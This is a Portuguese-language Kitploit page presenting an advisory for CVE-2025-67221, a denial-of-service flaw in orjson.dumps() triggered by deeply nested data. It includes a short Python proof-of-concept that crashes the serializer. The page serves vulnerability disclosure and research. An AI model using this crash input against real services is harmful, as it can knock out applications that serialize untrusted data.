Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-67221 — Documentação e código de reprodução para CVE-2025-67221, uma vulnerabilidade de negação de serviço na função dumps() do orjson causada por recursão descontrolada ao serializar dados JSON profundamente aninhados. | Kitploit
Ferramentas/GitHubGitHub/kpatsakis/cve-2025-67221
Análise de VulnerabilidadesAnálise de CódigoPapers e PesquisaAprendizado e Educação
GitHubkpatsakis/cve-2025-67221

CVE-2025-67221

Documentação e código de reprodução para CVE-2025-67221, uma vulnerabilidade de negação de serviço na função dumps() do orjson causada por recursão descontrolada ao serializar dados JSON profundamente aninhados.

Ver Repositório
112há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-67221

Resumo da Vulnerabilidade

CampoValor
CVE IDCVE-2025-67221
Produto Afetadoorjson
Versões Afetadas≤ 3.11.4
Tipo de VulnerabilidadeNegação de Serviço (Recursão Não Controlada)
Vetor de AtaqueRemoto (se o atacante controlar dados serializados)

Descrição

Existe uma vulnerabilidade de negação de serviço na função orjson.dumps() no orjson versões 3.11.4 e anteriores. A função não impõe um limite de recursão ao serializar estruturas de dados JSON profundamente aninhadas. Um atacante que possa fazer com que uma aplicação serialize dados aninhados controlados pelo atacante pode desencadear uma falha na rotina de serialização.

Função Afetada

  • Função: orjson.dumps()
  • Arquivo: pysrc/orjson/__init__.pyi

Testes

Testado em

  • Python 3.12.3/3.11.2/3.12.3/3.13.9/3.14.0 no Ubuntu Linux kernel 6.8.0-88
  • Python 3.13.3 Microsoft Windows 11 Education 10.0.26200 Build 26200

Impacto

Aplicações que utilizam orjson para serializar estruturas de dados não confiáveis ou controladas pelo atacante podem ser vulneráveis a ataques de negação de serviço.

Código de Reprodução

Código para replicar a vulnerabilidade localmente:

root@kitploit:~
import orjson
import sys
import platform
print(f'OS: {platform.platform()}') 
print(f'Python version: {sys. version}') 
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
    nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)

Demonstração

O código acima leva a um belo core dump Demonstração

Autores / Pesquisadores

  • Constantinos Patsakis, Departamento de Informática, Universidade do Pireu, Grécia
  • Evgenios Gkritsis, Departamento de Informática, Universidade de Economia e Negócios de Atenas, Grécia
  • George Stergiopoulos, Departamento de Informática, Universidade de Economia e Negócios de Atenas, Grécia

Referências

  • https://github.com/ijl/orjson (Projeto afetado)
Baixar ferramenta